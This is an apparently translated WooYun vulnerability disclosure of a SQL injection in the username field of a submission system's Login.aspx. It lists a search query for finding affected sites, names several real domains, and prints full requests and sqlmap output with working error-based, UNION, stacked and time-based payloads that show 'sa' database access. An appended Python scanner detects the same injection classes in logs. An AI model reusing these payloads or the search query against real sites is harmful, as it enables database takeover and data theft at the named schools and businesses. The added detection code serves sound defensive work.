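Vulnerability summary

Vulnerability ID: wooyun-2014-076272

Title: A generic SQL injection vulnerability affecting a large number of school and enterprise websites

Vendor: cncert (National Internet Emergency Center)

Author: Mr.leo

Submitted: 2014-09-29 12:10

Fixed: 2014-12-28 12:12

Publicly disclosed: 2014-12-28 12:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org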


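Vulnerability details

Disclosure status:

2014-09-29: Details reported to the vendor; awaiting vendor handling
2014-09-30: Vendor confirmed; details disclosed to the vendor only
2014-10-03: Details opened to third-party security partners
2014-11-24: Details disclosed to core white hats and experts in related fields
2014-12-04: Details disclosed to regular white hats
2014-12-14: Details disclosed to intern white hats
2014-12-28: Details disclosed to the public

Brief description:

BOOM!!!

Detailed description:

Search keyword: 技术支持:南京杰诺瀚软件科技有限公司 ("Technical support: 南京杰诺瀚软件科技有限公司"), which identifies the manuscript submission system developed by that company.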
http://www.so.com/s?q=技术支持:南京杰诺瀚软件科技有限公司&pn=6&j=0&ls=0&src=srp_paging&fr=se6_drag&psid=fd6d2e7d82880c6dc196c2c8a1252a12

Five cases as proof: the username parameter is not filtered, which leads to injection.
http://www.gjmzyfs.com/Web/Login.aspx
http://www.lcsjwk.com/Web/Login.aspx
http://www.jsnyxb.com/Web/Login.aspx
http://ctc.hlglzz.com/Web/Login.aspx
http://xb.cuit.edu.cn/Web/Login.aspx

1.
POST /Web/Login.aspx HTTP/1.1
Host: www.cnemergency.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.cnemergency.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cnemergency.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx

username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=1' AND 9341=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(97)+CHAR(58)+(SELECT (CASE WHEN (9341=9341) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(107)+CHAR(102)+CHAR(58))) AND 'bbVN'='bbVN&password=2&butOk= ? ?
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(111)+CHAR(109)+CHAR(97)+CHAR(58)+CHAR(88)+CHAR(121)+CHAR(120)+CHAR(72)+CHAR(102)+CHAR(89)+CHAR(121)+CHAR(115)+CHAR(122)+CHAR(101)+CHAR(58)+CHAR(102)+CHAR(107)+CHAR(102)+CHAR(58)-- &password=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:02:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:02:19] [INFO] fetching current user
current user: 'sa'
[19:02:19] [INFO] fetching current database
current database: 'jjyx'
[19:02:19] [INFO] fetching database names
[19:02:22] [INFO] the SQL query used returns 59 entries

2.
POST /Web/Login.aspx HTTP/1.1
Host: gaojian.xhnj.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://gaojian.xhnj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://gaojian.xhnj.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx

username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(114)+CHAR(122)+CHAR(101)+CHAR(58)+CHAR(107)+CHAR(88)+CHAR(85)+CHAR(112)+CHAR(112)+CHAR(72)+CHAR(100)+CHAR(119)+CHAR(114)+CHAR(103)+CHAR(58)+CHAR(100)+CHAR(99)+CHAR(107)+CHAR(58)-- &password=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:09:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:09:20] [INFO] fetching current user
current user: 'sa'
[19:09:20] [INFO] fetching current database
current database: 'xhnj'
[19:09:20] [INFO] fetching database names
[19:09:20] [INFO] the SQL query used returns 59 entries

3.
POST /Web/Login.aspx HTTP/1.1
Host: www.lcsjwk.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.lcsjwk.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lcsjwk.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx

username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+

Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(116)+CHAR(118)+CHAR(97)+CHAR(58)+CHAR(100)+CHAR(117)+CHAR(113)+CHAR(88)+CHAR(80)+CHAR(113)+CHAR(113)+CHAR(114)+CHAR(82)+CHAR(87)+CHAR(58)+CHAR(108)+CHAR(112)+CHAR(106)+CHAR(58)-- &password=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:11:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:11:32] [INFO] fetching current user
current user: 'sa'
[19:11:32] [INFO] fetching current database
current database: 'lcsjwk'
[19:11:32] [INFO] fetching database names
[19:11:33] [INFO] the SQL query used returns 59 entries

4.
POST /Web/Login.aspx HTTP/1.1
Host: www.jsnyxb.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.jsnyxb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.jsnyxb.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx

username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+

Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(102)+CHAR(97)+CHAR(115)+CHAR(58)+CHAR(100)+CHAR(115)+CHAR(85)+CHAR(88)+CHAR(104)+CHAR(104)+CHAR(90)+CHAR(121)+CHAR(86)+CHAR(74)+CHAR(58)+CHAR(122)+CHAR(102)+CHAR(109)+CHAR(58)-- &password=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:12:40] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:12:40] [INFO] fetching current user
current user: 'sa'
[19:12:40] [INFO] fetching current database
current database: 'nky'
[19:12:40] [INFO] fetching database names
[19:12:41] [INFO] the SQL query used returns 59 entries

5.
POST /Web/Login.aspx HTTP/1.1
Host: ctc.hlglzz.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://ctc.hlglzz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ctc.hlglzz.com/Web/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: reurl=index.aspx

username=1&password=2&butOk=+%E7%99%BB++%E5%BD%95+

Place: POST
Parameter: username
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: username=1' UNION ALL SELECT CHAR(58)+CHAR(99)+CHAR(120)+CHAR(111)+CHAR(58)+CHAR(97)+CHAR(99)+CHAR(90)+CHAR(83)+CHAR(80)+CHAR(118)+CHAR(81)+CHAR(103)+CHAR(80)+CHAR(72)+CHAR(58)+CHAR(116)+CHAR(97)+CHAR(99)+CHAR(58)-- &password=2&butOk= ? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1'; WAITFOR DELAY '0:0:5';--&password=2&butOk= ? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1' WAITFOR DELAY '0:0:5'--&password=2&butOk= ? ?
---
[19:13:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[19:13:29] [INFO] fetching current user
current user: 'sa'
[19:13:29] [INFO] fetching current database
current database: 'hlgl'
[19:13:29] [INFO] fetching database names
[19:13:29] [INFO] the SQL query used returns 59 entries

Proof of vulnerability:

Already proven

Fix:

Filtering
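
For operators of sites running this submission system, an added example (not part of the original report, and not the vendor's code) that scans logged POST bodies for /Web/Login.aspx and tags username values matching the four technique classes in the sqlmap output above. The path and field name come from the requests on this page; the rule names, function names, hosts and sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlencode

# One rule per technique class in the sqlmap output above (SQL Server syntax).
# Rule names, function names and all sample data below are constructed.
RULES = [
    ("error-based", re.compile(r"=\s*CONVERT\s*\(\s*INT\s*,", re.I)),
    ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("stacked", re.compile(r";\s*(?:WAITFOR|EXEC|SELECT|INSERT|UPDATE|DELETE|DROP|DECLARE)\b", re.I)),
    ("time-based", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
]

def classify_username(value):
    """Return the tags of every rule that matches one decoded username value."""
    # Also test one further decoding pass so double-encoded input is not missed.
    candidates = (value, unquote_plus(value))
    return [tag for tag, rx in RULES if any(rx.search(c) for c in candidates)]

def scan_login_body(body):
    """Parse a form-urlencoded POST body and classify each username value."""
    # separator="&" keeps ';' inside a value instead of splitting the field on it.
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    tags = []
    for value in fields.get("username", []):  # repeated parameters are all checked
        tags.extend(t for t in classify_username(value) if t not in tags)
    return tags

def scan_log(entries):
    """entries: (host, path, body) tuples. Return (host, tags) for flagged logins."""
    hits = []
    for host, path, body in entries:
        if path.lower() == "/web/login.aspx":
            tags = scan_login_body(body)
            if tags:
                hits.append((host, tags))
    return hits

# Constructed log entries: placeholder hosts, bodies shaped like the requests above.
SAMPLE_LOG = [
    ("site-a.example", "/Web/Login.aspx", urlencode({"username": "editor01", "password": "2"})),
    ("site-a.example", "/Web/Login.aspx",
     urlencode({"username": "1'; WAITFOR DELAY '0:0:5';--", "password": "2"})),
    ("site-b.example", "/Web/Login.aspx",
     urlencode({"username": "1' UNION ALL SELECT CHAR(58)+CHAR(111)-- ", "password": "2"})),
    ("site-b.example", "/Web/Index.aspx", urlencode({"username": "1' WAITFOR DELAY '0:0:5'--"})),
]

if __name__ == "__main__":
    for host, tags in scan_log(SAMPLE_LOG):
        print(host, ", ".join(tags))
```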

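Copyright notice: when reposting, please credit the source Mr.leo@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-09-30 10:06

Vendor reply:

Latest status:

None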